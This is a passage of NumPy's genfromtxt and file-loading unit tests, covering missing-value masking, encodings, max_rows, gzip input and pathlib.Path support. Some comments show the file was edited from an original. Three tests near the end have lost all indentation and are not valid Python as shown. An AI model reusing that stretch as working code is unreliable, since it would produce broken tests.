    # corresponding number of whitespace-separated columns.
    c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
    dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
                   ('block', int, (2, 3))])
    x = np.genfromtxt(c, dtype=dt)
    a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
                 dtype=dt)
    assert_array_equal(x, a)
def test_withmissing(self):
    data = TextIO('A,B\n0,1\n2,N/A')
    kwargs = dict(delimiter=",", missing_values="N/A", names=True)
    # With dtype=None the columns come out as integers.
    test = np.genfromtxt(data, dtype=None, usemask=True, **kwargs)
    control = ma.array([(0, 1), (2, -1)],
                       mask=[(False, False), (False, True)],
                       dtype=[('A', int), ('B', int)])
    assert_equal(test, control)
    assert_equal(test.mask, control.mask)
    # Without a dtype argument the default (float) is used instead.
    data.seek(0)
    test = np.genfromtxt(data, usemask=True, **kwargs)
    control = ma.array([(0, 1), (2, -1)],
                       mask=[(False, False), (False, True)],
                       dtype=[('A', float), ('B', float)])
    assert_equal(test, control)
    assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
    data = "A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
    basekwargs = dict(dtype=None, delimiter=",", names=True,)
    mdtype = [('A', int), ('B', float), ('C', complex)]
    # A single missing marker applied to every column.
    test = np.genfromtxt(TextIO(data), missing_values="N/A",
                         **basekwargs)
    control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
                        (-9, 2.2, -999j), (3, -99, 3j)],
                       mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
                       dtype=mdtype)
    assert_equal(test, control)
    # Per-column missing values keyed by column index.
    basekwargs['dtype'] = mdtype
    test = np.genfromtxt(TextIO(data),
                         missing_values={0: -9, 1: -99, 2: -999j}, usemask=True, **basekwargs)
    control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
                        (-9, 2.2, -999j), (3, -99, 3j)],
                       mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
                       dtype=mdtype)
    assert_equal(test, control)
    # Per-column missing values keyed by a mix of index and name.
    test = np.genfromtxt(TextIO(data),
                         missing_values={0: -9, 'B': -99, 'C': -999j},
                         usemask=True,
                         **basekwargs)
    control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
                        (-9, 2.2, -999j), (3, -99, 3j)],
                       mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
                       dtype=mdtype)
    assert_equal(test, control)
def test_user_filling_values(self):
    # Test with missing and filling values.
    # (The original opened with a `ctrl` assignment that was overwritten
    # before ever being used -- dead code, removed.)
    data = "N/A, 2, 3\n4, ,???"
    kwargs = dict(delimiter=",",
                  dtype=int,
                  names="a,b,c",
                  missing_values={0: "N/A", 'b': " ", 2: "???"},
                  filling_values={0: 0, 'b': 0, 2: -999})
    test = np.genfromtxt(TextIO(data), **kwargs)
    ctrl = np.array([(0, 2, 3), (4, 0, -999)],
                    dtype=[(_, int) for _ in "abc"])
    assert_equal(test, ctrl)
    # usecols keeps per-column missing/filling specifications aligned
    # with the original column indices/names.
    test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
    ctrl = np.array([(0, 3), (4, -999)], dtype=[(_, int) for _ in "ac"])
    assert_equal(test, ctrl)
    # Scalar missing/filling values apply to every column.
    data2 = "1,2,*,4\n5,*,7,8\n"
    test = np.genfromtxt(TextIO(data2), delimiter=',', dtype=int,
                         missing_values="*", filling_values=0)
    ctrl = np.array([[1, 2, 0, 4], [5, 0, 7, 8]])
    assert_equal(test, ctrl)
    test = np.genfromtxt(TextIO(data2), delimiter=',', dtype=int,
                         missing_values="*", filling_values=-1)
    ctrl = np.array([[1, 2, -1, 4], [5, -1, 7, 8]])
    assert_equal(test, ctrl)
def test_withmissing_float(self):
    data = TextIO('A,B\n0,1.5\n2,-999.00')
    # The control mask shows '-999.00' is treated as matching the
    # missing value '-999.0' despite the extra trailing zero.
    test = np.genfromtxt(data, dtype=None, delimiter=',',
                         missing_values='-999.0', names=True, usemask=True)
    control = ma.array([(0, 1.5), (2, -1.)],
                       mask=[(False, False), (False, True)],
                       dtype=[('A', int), ('B', float)])
    assert_equal(test, control)
    assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
    # Values listed in missing_values are masked in a uniform array.
    result = np.genfromtxt(TextIO('1 2 3\n4 5 6\n'), dtype=None,
                           missing_values='2,5', usemask=True)
    expected = ma.array([[1, 2, 3], [4, 5, 6]],
                        mask=[[0, 1, 0], [0, 1, 0]])
    assert_equal(result, expected)
def test_with_masked_column_various(self):
    # Test masked column
    data = TextIO('True 2 3\nFalse 5 6\n')
    test = np.genfromtxt(data, dtype=None,
                         missing_values='2,5', usemask=True)
    # Mixed column types yield a structured masked array.
    control = ma.array([(1, 2, 3), (0, 5, 6)],
                       mask=[(0, 1, 0), (0, 1, 0)],
                       dtype=[('f0', bool), ('f1', bool), ('f2', int)])
    assert_equal(test, control)
def test_invalid_raise(self):
    # Test invalid raise
    data = ["1, 1, 1, 1, 1"] * 50
    # Corrupt every tenth row (4 well-formed columns instead of 5).
    for i in range(5):
        data[10 * i] = "2, 2, 2, 2 2"
    data.insert(0, "a, b, c, d, e")
    mdata = TextIO("\n".join(data))
    kwargs = dict(delimiter=",", dtype=None, names=True)
    # XXX: is there a better way to get the return value of the
    # callable in assert_warns ?
    ret = {}
    def f(_ret={}):
        _ret['mtest'] = np.genfromtxt(mdata, invalid_raise=False, **kwargs)
    assert_warns(ConversionWarning, f, _ret=ret)
    mtest = ret['mtest']
    # The 5 bad rows are skipped, leaving 45 valid ones.
    assert_equal(len(mtest), 45)
    assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'abcde']))
    # By default (invalid_raise=True) the malformed rows raise instead.
    mdata.seek(0)
    assert_raises(ValueError, np.genfromtxt, mdata,
                  delimiter=",", names=True)
def test_invalid_raise_with_usecols(self):
    # Test invalid_raise with usecols
    data = ["1, 1, 1, 1, 1"] * 50
    # Corrupt every tenth row (only 4 well-formed columns).
    for i in range(5):
        data[10 * i] = "2, 2, 2, 2 2"
    data.insert(0, "a, b, c, d, e")
    mdata = TextIO("\n".join(data))
    kwargs = dict(delimiter=",", dtype=None, names=True,
                  invalid_raise=False)
    # XXX: is there a better way to get the return value of the
    # callable in assert_warns ?
    ret = {}
    def f(_ret={}):
        _ret['mtest'] = np.genfromtxt(mdata, usecols=(0, 4), **kwargs)
    assert_warns(ConversionWarning, f, _ret=ret)
    mtest = ret['mtest']
    # The bad rows lack a fifth column, so they are dropped here.
    assert_equal(len(mtest), 45)
    assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'ae']))
    # Selecting only the first two columns makes every row valid.
    mdata.seek(0)
    mtest = np.genfromtxt(mdata, usecols=(0, 1), **kwargs)
    assert_equal(len(mtest), 50)
    control = np.ones(50, dtype=[(_, int) for _ in 'ab'])
    control[[10 * _ for _ in range(5)]] = (2, 2)
    assert_equal(mtest, control)
def test_inconsistent_dtype(self):
    # A converter producing strings clashes with the declared int field
    # and must raise a ValueError.
    raw = "\n".join(["1, 1, 1, 1, -1.1"] * 50)
    wrap_last = {4: lambda x: "(%s)" % x.decode()}
    kwargs = dict(delimiter=",", converters=wrap_last,
                  dtype=[(_, int) for _ in 'abcde'],)
    assert_raises(ValueError, np.genfromtxt, TextIO(raw), **kwargs)
def test_default_field_format(self):
    # defaultfmt controls the auto-generated field names.
    result = np.genfromtxt(TextIO("0, 1, 2.3\n4, 5, 6.7"),
                           delimiter=",", dtype=None, defaultfmt="f%02i")
    expected = np.array([(0, 1, 2.3), (4, 5, 6.7)],
                        dtype=[("f00", int), ("f01", int), ("f02", float)])
    assert_equal(result, expected)
def test_single_dtype_wo_names(self):
    # A single scalar dtype without names yields a plain 2-D array;
    # defaultfmt has no effect in that case.
    result = np.genfromtxt(TextIO("0, 1, 2.3\n4, 5, 6.7"),
                           delimiter=",", dtype=float, defaultfmt="f%02i")
    expected = np.array([[0., 1., 2.3], [4., 5., 6.7]], dtype=float)
    assert_equal(result, expected)
def test_single_dtype_w_explicit_names(self):
    # Test single dtype w explicit names
    data = "0, 1, 2.3\n4, 5, 6.7"
    # Explicit names promote the result to a structured array.
    mtest = np.genfromtxt(TextIO(data),
                          delimiter=",", dtype=float, names="a, b, c")
    ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
                    dtype=[(_, float) for _ in "abc"])
    assert_equal(mtest, ctrl)
def test_single_dtype_w_implicit_names(self):
    # Test single dtype w implicit names
    data = "a, b, c\n0, 1, 2.3\n4, 5, 6.7"
    # names=True reads the field names from the first line.
    mtest = np.genfromtxt(TextIO(data),
                          delimiter=",", dtype=float, names=True)
    ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
                    dtype=[(_, float) for _ in "abc"])
    assert_equal(mtest, ctrl)
def test_easy_structured_dtype(self):
    # Test easy structured dtype
    data = "0, 1, 2.3\n4, 5, 6.7"
    # A tuple of scalar dtypes gets auto-generated names via defaultfmt.
    mtest = np.genfromtxt(TextIO(data), delimiter=",",
                          dtype=(int, float, float), defaultfmt="f_%02i")
    ctrl = np.array([(0, 1., 2.3), (4, 5., 6.7)],
                    dtype=[("f_00", int), ("f_01", float), ("f_02", float)])
    assert_equal(mtest, ctrl)
def test_autostrip(self):
    # Test autostrip
    data = "01/01/2003 , 1.3, abcde"
    kwargs = dict(delimiter=",", dtype=None)
    with warnings.catch_warnings(record=True) as w:
        warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
        # Without autostrip the surrounding whitespace is kept.
        mtest = np.genfromtxt(TextIO(data), **kwargs)
        assert_(w[0].category is np.VisibleDeprecationWarning)
    ctrl = np.array([('01/01/2003 ', 1.3, ' abcde')],
                    dtype=[('f0', '|S12'), ('f1', float), ('f2', '|S8')])
    assert_equal(mtest, ctrl)
    with warnings.catch_warnings(record=True) as w:
        warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
        # autostrip=True strips each field before conversion.
        mtest = np.genfromtxt(TextIO(data), autostrip=True, **kwargs)
        assert_(w[0].category is np.VisibleDeprecationWarning)
    ctrl = np.array([('01/01/2003', 1.3, 'abcde')],
                    dtype=[('f0', '|S10'), ('f1', float), ('f2', '|S5')])
    assert_equal(mtest, ctrl)
def test_replace_space(self):
    # Test the 'replace_space' option
    # Header names contain spaces and punctuation that get sanitized.
    txt = "A.A, B (B), C:C\n1, 2, 3.14"
    # Test default: replace ' ' by '_' and delete non-alphanum chars
    test = np.genfromtxt(TextIO(txt),
                         delimiter=",", names=True, dtype=None)
    ctrl_dtype = [("AA", int), ("B_B", int), ("CC", float)]
    ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
    assert_equal(test, ctrl)
    # Test: no replace, no delete
    test = np.genfromtxt(TextIO(txt),
                         delimiter=",", names=True, dtype=None,
                         replace_space='', deletechars='')
    ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", float)]
    ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
    assert_equal(test, ctrl)
    # Test: no delete (spaces are replaced by _)
    test = np.genfromtxt(TextIO(txt),
                         delimiter=",", names=True, dtype=None,
                         deletechars='')
    ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", float)]
    ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
    assert_equal(test, ctrl)
def test_replace_space_known_dtype(self):
    # Test the 'replace_space' (and related) options when dtype != None
    # Same sanitizing rules must apply with an explicit dtype.
    txt = "A.A, B (B), C:C\n1, 2, 3"
    # Test default: replace ' ' by '_' and delete non-alphanum chars
    test = np.genfromtxt(TextIO(txt),
                         delimiter=",", names=True, dtype=int)
    ctrl_dtype = [("AA", int), ("B_B", int), ("CC", int)]
    ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
    assert_equal(test, ctrl)
    # Test: no replace, no delete
    test = np.genfromtxt(TextIO(txt),
                         delimiter=",", names=True, dtype=int,
                         replace_space='', deletechars='')
    ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", int)]
    ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
    assert_equal(test, ctrl)
    # Test: no delete (spaces are replaced by _)
    test = np.genfromtxt(TextIO(txt),
                         delimiter=",", names=True, dtype=int,
                         deletechars='')
    ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", int)]
    ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
    assert_equal(test, ctrl)
def test_incomplete_names(self):
    # Test w/ incomplete names: the empty name in "A,,C" is completed
    # with a default field name ('f0').
    data = "A,,C\n0,1,2\n3,4,5"
    kwargs = dict(delimiter=",", names=True)
    # w/ dtype=None
    ctrl = np.array([(0, 1, 2), (3, 4, 5)],
                    dtype=[(_, int) for _ in ('A', 'f0', 'C')])
    test = np.genfromtxt(TextIO(data), dtype=None, **kwargs)
    assert_equal(test, ctrl)
    # w/ default dtype
    ctrl = np.array([(0, 1, 2), (3, 4, 5)],
                    dtype=[(_, float) for _ in ('A', 'f0', 'C')])
    test = np.genfromtxt(TextIO(data), **kwargs)
    # The original computed this result but never checked it (missing
    # assertion); compare against the float control as intended.
    assert_equal(test, ctrl)
def test_names_auto_completion(self):
    # Fewer names than fields: the missing ones are auto-generated.
    result = np.genfromtxt(TextIO("1 2 3\n 4 5 6"),
                           dtype=(int, float, int), names="a")
    expected = np.array([(1, 2, 3), (4, 5, 6)],
                        dtype=[('a', int), ('f0', float), ('f1', int)])
    assert_equal(result, expected)
def test_names_with_usecols_bug1636(self):
    # Make sure we pick up the right names w/ usecols
    data = "A,B,C,D,E\n0,1,2,3,4\n0,1,2,3,4\n0,1,2,3,4"
    ctrl_names = ("A", "C", "E")
    # usecols as indices ...
    test = np.genfromtxt(TextIO(data),
                         dtype=(int, int, int), delimiter=",",
                         usecols=(0, 2, 4), names=True)
    assert_equal(test.dtype.names, ctrl_names)
    # ... as names with a per-column dtype ...
    test = np.genfromtxt(TextIO(data),
                         dtype=(int, int, int), delimiter=",",
                         usecols=("A", "C", "E"), names=True)
    assert_equal(test.dtype.names, ctrl_names)
    # ... and as names with a single scalar dtype.
    test = np.genfromtxt(TextIO(data),
                         dtype=int, delimiter=",",
                         usecols=("A", "C", "E"), names=True)
    assert_equal(test.dtype.names, ctrl_names)
def test_fixed_width_names(self):
    # Test fix-width w/ names
    # Fields are padded to widths 5, 5 and 4 characters.
    data = "    A    B   C\n    0    1 2.3\n   45   67   9."
    kwargs = dict(delimiter=(5, 5, 4), names=True, dtype=None)
    ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
                    dtype=[('A', int), ('B', int), ('C', float)])
    test = np.genfromtxt(TextIO(data), **kwargs)
    assert_equal(test, ctrl)
    # A single integer delimiter means a uniform field width.
    kwargs = dict(delimiter=5, names=True, dtype=None)
    ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
                    dtype=[('A', int), ('B', int), ('C', float)])
    test = np.genfromtxt(TextIO(data), **kwargs)
    assert_equal(test, ctrl)
def test_filling_values(self):
    # A scalar filling value replaces every missing entry.
    raw = b"1, 2, 3\n1, , 5\n0, 6, \n"
    result = np.genfromtxt(TextIO(raw), delimiter=",", dtype=None,
                           filling_values=-999)
    expected = np.array([[1, 2, 3], [1, -999, 5], [0, 6, -999]], dtype=int)
    assert_equal(result, expected)
def test_comments_is_none(self):
    # Github issue 329 (None was previously being converted to 'None').
    with warnings.catch_warnings(record=True) as w:
        warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
        test = np.genfromtxt(TextIO("test1,testNonetherestofthedata"),
                             dtype=None, comments=None, delimiter=',')
        assert_(w[0].category is np.VisibleDeprecationWarning)
    # With comments disabled the 'None' substring is kept verbatim.
    assert_equal(test[1], b'testNonetherestofthedata')
    with warnings.catch_warnings(record=True) as w:
        warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
        test = np.genfromtxt(TextIO("test1, testNonetherestofthedata"),
                             dtype=None, comments=None, delimiter=',')
        assert_(w[0].category is np.VisibleDeprecationWarning)
    # Leading whitespace after the delimiter is preserved.
    assert_equal(test[1], b' testNonetherestofthedata')
def test_latin1(self):
    # Raw latin1 bytes survive with dtype=None (bytes columns), and
    # decode properly when encoding='latin1' is supplied.
    latin1 = b'\xf6\xfc\xf6'
    norm = b"norm1,norm2,norm3\n"
    enc = b"test1,testNonethe" + latin1 + b",test3\n"
    s = norm + enc + norm
    with warnings.catch_warnings(record=True) as w:
        warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
        test = np.genfromtxt(TextIO(s),
                             dtype=None, comments=None, delimiter=',')
        assert_(w[0].category is np.VisibleDeprecationWarning)
    assert_equal(test[1, 0], b"test1")
    assert_equal(test[1, 1], b"testNonethe" + latin1)
    assert_equal(test[1, 2], b"test3")
    test = np.genfromtxt(TextIO(s),
                         dtype=None, comments=None, delimiter=',',
                         encoding='latin1')
    assert_equal(test[1, 0], u"test1")
    assert_equal(test[1, 1], u"testNonethe" + latin1.decode('latin1'))
    assert_equal(test[1, 2], u"test3")
    # Mixed numeric/bytes columns keep the raw bytes too.
    with warnings.catch_warnings(record=True) as w:
        warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
        test = np.genfromtxt(TextIO(b"0,testNonethe" + latin1),
                             dtype=None, comments=None, delimiter=',')
        assert_(w[0].category is np.VisibleDeprecationWarning)
    assert_equal(test['f0'], 0)
    assert_equal(test['f1'], b"testNonethe" + latin1)
def test_binary_decode_autodtype(self):
    # A UTF-16 byte stream (with BOM) is decoded before parsing.
    utf16 = b'\xff\xfeh\x04 \x00i\x04 \x00j\x04'
    v = self.loadfunc(BytesIO(utf16), dtype=None, encoding='UTF-16')
    assert_array_equal(v, np.array(utf16.decode('UTF-16').split()))
def test_utf8_byte_encoding(self):
    # Without an encoding argument, non-ASCII (UTF-8) input is kept as
    # raw byte strings and a VisibleDeprecationWarning is issued.
    utf8 = b"\xcf\x96"
    norm = b"norm1,norm2,norm3\n"
    enc = b"test1,testNonethe" + utf8 + b",test3\n"
    s = norm + enc + norm
    with warnings.catch_warnings(record=True) as w:
        warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
        test = np.genfromtxt(TextIO(s),
                             dtype=None, comments=None, delimiter=',')
        assert_(w[0].category is np.VisibleDeprecationWarning)
    # Every field stays a bytes object, including the UTF-8 bytes.
    ctl = np.array([
             [b'norm1', b'norm2', b'norm3'],
             [b'test1', b'testNonethe' + utf8, b'test3'],
             [b'norm1', b'norm2', b'norm3']])
    assert_array_equal(test, ctl)
def test_utf8_file(self):
    # Reading a UTF-8 encoded file with an explicit encoding yields
    # unicode fields; also exercises a mixed (int, str) auto-dtype.
    utf8 = b"\xcf\x96"
    with temppath() as path:
        with open(path, "wb") as f:
            f.write((b"test1,testNonethe" + utf8 + b",test3\n") * 2)
        test = np.genfromtxt(path, dtype=None, comments=None,
                             delimiter=',', encoding="UTF-8")
        ctl = np.array([
                 ["test1", "testNonethe" + utf8.decode("UTF-8"), "test3"],
                 ["test1", "testNonethe" + utf8.decode("UTF-8"), "test3"]],
                 dtype=np.unicode_)
        assert_array_equal(test, ctl)
        # test a mixed dtype
        with open(path, "wb") as f:
            f.write(b"0,testNonethe" + utf8)
        test = np.genfromtxt(path, dtype=None, comments=None,
                             delimiter=',', encoding="UTF-8")
        assert_equal(test['f0'], 0)
        assert_equal(test['f1'], "testNonethe" + utf8.decode("UTF-8"))
def test_utf8_file_nodtype_unicode(self):
    # bytes encoding with non-latin1 -> unicode upcast
    utf8 = u'\u03d6'
    latin1 = u'\xf6\xfc\xf6'
    # skip test if cannot encode utf8 test string with preferred
    # encoding. The preferred encoding is assumed to be the default
    # encoding of io.open. Will need to change this for PyTest, maybe
    # using pytest.mark.xfail(raises=***).
    try:
        encoding = locale.getpreferredencoding()
        utf8.encode(encoding)
    except (UnicodeError, ImportError):
        pytest.skip('Skipping test_utf8_file_nodtype_unicode, '
                    'unable to encode utf8 in preferred encoding')
    with temppath() as path:
        with io.open(path, "wt") as f:
            f.write(u"norm1,norm2,norm3\n")
            f.write(u"norm1," + latin1 + u",norm3\n")
            f.write(u"test1,testNonethe" + utf8 + u",test3\n")
        with warnings.catch_warnings(record=True) as w:
            warnings.filterwarnings('always', '',
                                    np.VisibleDeprecationWarning)
            test = np.genfromtxt(path, dtype=None, comments=None,
                                 delimiter=',')
            # Check for warning when encoding not specified.
            assert_(w[0].category is np.VisibleDeprecationWarning)
        # Because the file contains non-latin1 characters, the result is
        # upcast to a unicode array rather than bytes.
        ctl = np.array([
                 ["norm1", "norm2", "norm3"],
                 ["norm1", latin1, "norm3"],
                 ["test1", "testNonethe" + utf8, "test3"]],
                 dtype=np.unicode_)
        assert_array_equal(test, ctl)
def test_recfromtxt(self):
    """np.recfromtxt returns a recarray; usemask=True yields masked data."""
    kwargs = dict(delimiter=",", missing_values="N/A", names=True)
    # Plain integer data -> np.recarray with named fields.
    got = np.recfromtxt(TextIO('A,B\n0,1\n2,3'), **kwargs)
    want = np.array([(0, 1), (2, 3)],
                    dtype=[('A', int), ('B', int)])
    assert_(isinstance(got, np.recarray))
    assert_equal(got, want)
    # A missing value plus usemask=True -> masked record array.
    got = np.recfromtxt(TextIO('A,B\n0,1\n2,N/A'), dtype=None,
                        usemask=True, **kwargs)
    want = ma.array([(0, 1), (2, -1)],
                    mask=[(False, False), (False, True)],
                    dtype=[('A', int), ('B', int)])
    assert_equal(got, want)
    assert_equal(got.mask, want.mask)
    assert_equal(got.A, [0, 2])
def test_recfromcsv(self):
    # np.recfromcsv: recarray result, case_sensitive names, usemask,
    # explicit dtype, and per-column converters (gh-10394).
    data = TextIO('A,B\n0,1\n2,3')
    kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
    test = np.recfromcsv(data, dtype=None, **kwargs)
    control = np.array([(0, 1), (2, 3)],
                       dtype=[('A', int), ('B', int)])
    assert_(isinstance(test, np.recarray))
    assert_equal(test, control)
    # Missing value with usemask=True -> masked record array.
    data = TextIO('A,B\n0,1\n2,N/A')
    test = np.recfromcsv(data, dtype=None, usemask=True, **kwargs)
    control = ma.array([(0, 1), (2, -1)],
                       mask=[(False, False), (False, True)],
                       dtype=[('A', int), ('B', int)])
    assert_equal(test, control)
    assert_equal(test.mask, control.mask)
    assert_equal(test.A, [0, 2])
    # Default case_sensitive=False lower-cases the field names.
    data = TextIO('A,B\n0,1\n2,3')
    test = np.recfromcsv(data, missing_values='N/A',)
    control = np.array([(0, 1), (2, 3)],
                       dtype=[('a', int), ('b', int)])
    assert_(isinstance(test, np.recarray))
    assert_equal(test, control)
    # An explicit dtype overrides auto-detection.
    data = TextIO('A,B\n0,1\n2,3')
    dtype = [('a', int), ('b', float)]
    test = np.recfromcsv(data, missing_values='N/A', dtype=dtype)
    control = np.array([(0, 1), (2, 3)],
                       dtype=dtype)
    assert_(isinstance(test, np.recarray))
    assert_equal(test, control)
    #gh-10394
    data = TextIO('color\n"red"\n"blue"')
    test = np.recfromcsv(data, converters={0: lambda x: x.strip(b'\"')})
    control = np.array([('red',), ('blue',)], dtype=[('color', (bytes, 4))])
    assert_equal(test.dtype, control.dtype)
    assert_equal(test, control)
def test_max_rows(self):
    # Test the `max_rows` keyword argument.
    data = '1 2\n3 4\n5 6\n7 8\n9 10\n'
    txt = TextIO(data)
    # Reading stops after max_rows; a second call continues from there.
    a1 = np.genfromtxt(txt, max_rows=3)
    a2 = np.genfromtxt(txt)
    assert_equal(a1, [[1, 2], [3, 4], [5, 6]])
    assert_equal(a2, [[7, 8], [9, 10]])
    # max_rows must be at least 1.
    assert_raises(ValueError, np.genfromtxt, TextIO(data), max_rows=0)
    # An input with several invalid rows.
    data = '1 1\n2 2\n0 \n3 3\n4 4\n5 \n6 \n7 \n'
    test = np.genfromtxt(TextIO(data), max_rows=2)
    control = np.array([[1., 1.], [2., 2.]])
    assert_equal(test, control)
    # Test keywords conflict
    assert_raises(ValueError, np.genfromtxt, TextIO(data), skip_footer=1,
                  max_rows=4)
    # Test with invalid value
    assert_raises(ValueError, np.genfromtxt, TextIO(data), max_rows=4)
    # Test with invalid not raise
    with suppress_warnings() as sup:
        sup.filter(ConversionWarning)
        # Bad rows inside the max_rows window are skipped silently.
        test = np.genfromtxt(TextIO(data), max_rows=4, invalid_raise=False)
        control = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]])
        assert_equal(test, control)
        test = np.genfromtxt(TextIO(data), max_rows=5, invalid_raise=False)
        control = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]])
        assert_equal(test, control)
    # Structured array with field names.
    data = 'a b\n#c d\n1 1\n2 2\n#0 \n3 3\n4 4\n5 5\n'
    # Test with header, names and comments
    txt = TextIO(data)
    test = np.genfromtxt(txt, skip_header=1, max_rows=3, names=True)
    control = np.array([(1.0, 1.0), (2.0, 2.0), (3.0, 3.0)],
                       dtype=[('c', '<f8'), ('d', '<f8')])
    assert_equal(test, control)
    # To continue reading the same "file", don't use skip_header or
    # names, and use the previously determined dtype.
    test = np.genfromtxt(txt, max_rows=None, dtype=test.dtype)
    control = np.array([(4.0, 4.0), (5.0, 5.0)],
                       dtype=[('c', '<f8'), ('d', '<f8')])
    assert_equal(test, control)
def test_gft_using_filename(self):
# Test that we can load data from a filename as well as a file
# object
tgt = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
with temppath() as name:
with open(name, 'w') as f:
f.write(data)
res = np.genfromtxt(name)
assert_array_equal(res, tgt)
def test_gft_from_gzip(self):
# Test that we can load data from a gzipped file
wanted = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
s = BytesIO()
with gzip.GzipFile(fileobj=s, mode='w') as g:
g.write(asbytes(data))
with temppath(suffix='.gz2') as name:
with open(name, 'w') as f:
f.write(data)
assert_array_equal(np.genfromtxt(name), wanted)
def test_gft_using_generator(self):
# gft doesn't work with unicode.
def count():
for i in range(10):
yield asbytes("%d" % i)
res = np.genfromtxt(count())
assert_array_equal(res, np.arange(10))
def test_auto_dtype_largeint(self):
    # Regression test for numpy/numpy#5635 whereby large integers could
    # cause OverflowErrors.
    # Test the automatic definition of the output dtype
    #
    # 2**66 = 73786976294838206464 => should convert to float
    # 2**34 = 17179869184 => should convert to int64
    # 2**10 = 1024 => should convert to int (int32 on 32-bit systems,
    #                 int64 on 64-bit systems)
    data = TextIO('73786976294838206464 17179869184 1024')
    test = np.genfromtxt(data, dtype=None)
    assert_equal(test.dtype.names, ['f0', 'f1', 'f2'])
    # Per-column dtype checks matching the comment above.
    assert_(test.dtype['f0'] == float)
    assert_(test.dtype['f1'] == np.int64)
    assert_(test.dtype['f2'] == np.integer)
    assert_allclose(test['f0'], 73786976294838206464.)
    assert_equal(test['f1'], 17179869184)
    assert_equal(test['f2'], 1024)
@pytest.mark.skipif(Path is None, reason="No pathlib.Path")
class TestPathUsage(object):
    # Test that pathlib.Path can be used
    def test_loadtxt(self):
        # savetxt/loadtxt round-trip through a Path instance.
        with temppath(suffix='.txt') as path:
            path = Path(path)
            a = np.array([[1.1, 2], [3, 4]])
            np.savetxt(path, a)
            x = np.loadtxt(path)
            assert_array_equal(x, a)
    def test_save_load(self):
        # Test that pathlib.Path instances can be used with save.
        with temppath(suffix='.npy') as path:
            path = Path(path)
            a = np.array([[1, 2], [3, 4]], int)
            np.save(path, a)
            data = np.load(path)
            assert_array_equal(data, a)
    def test_save_load_memmap(self):
        # Test that pathlib.Path instances can be loaded mem-mapped.
        with temppath(suffix='.npy') as path:
            path = Path(path)
            a = np.array([[1, 2], [3, 4]], int)
            np.save(path, a)
            data = np.load(path, mmap_mode='r')
            assert_array_equal(data, a)
            # close the mem-mapped file
            del data
    def test_save_load_memmap_readwrite(self):
        # Test that pathlib.Path instances can be written mem-mapped.
        with temppath(suffix='.npy') as path:
            path = Path(path)
            a = np.array([[1, 2], [3, 4]], int)
            np.save(path, a)
            b = np.load(path, mmap_mode='r+')
            # Writing through the memmap must persist to disk.
            a[0][0] = 5
            b[0][0] = 5
            del b  # closes the file
            data = np.load(path)
            assert_array_equal(data, a)
    def test_savez_load(self):
        # Test that pathlib.Path instances can be used with savez.
        with temppath(suffix='.npz') as path:
            path = Path(path)
            np.savez(path, lab='place holder')
            with np.load(path) as data:
                assert_array_equal(data['lab'], 'place holder')
    def test_savez_compressed_load(self):
        # Test that pathlib.Path instances can be used with savez.
        with temppath(suffix='.npz') as path:
            path = Path(path)
            np.savez_compressed(path, lab='place holder')
            data = np.load(path)
            assert_array_equal(data['lab'], 'place holder')
            data.close()
    def test_genfromtxt(self):
        # genfromtxt accepts a Path argument.
        with temppath(suffix='.txt') as path:
            path = Path(path)
            a = np.array([(1, 2), (3, 4)])
            np.savetxt(path, a)
            data = np.genfromtxt(path)
            assert_array_equal(a, data)
    def test_ndfromtxt(self):
        # Test outputting a standard ndarray
        with temppath(suffix='.txt') as path:
            path = Path(path)
            with path.open('w') as f:
                f.write(u'1 2\n3 4')
            control = np.array([[1, 2], [3, 4]], dtype=int)
            test = np.genfromtxt(path, dtype=int)
            assert_array_equal(test, control)
    def test_mafromtxt(self):
        # From `test_fancy_dtype_alt` above
        with temppath(suffix='.txt') as path:
            path = Path(path)
            with path.open('w') as f:
                f.write(u'1,2,3.0\n4,5,6.0\n')
            test = np.genfromtxt(path, delimiter=',', usemask=True)
            control = ma.array([(1.0, 2.0, 3.0), (4.0, 5.0, 6.0)])
            assert_equal(test, control)
    def test_recfromtxt(self):
        # recfromtxt accepts a Path argument.
        with temppath(suffix='.txt') as path:
            path = Path(path)
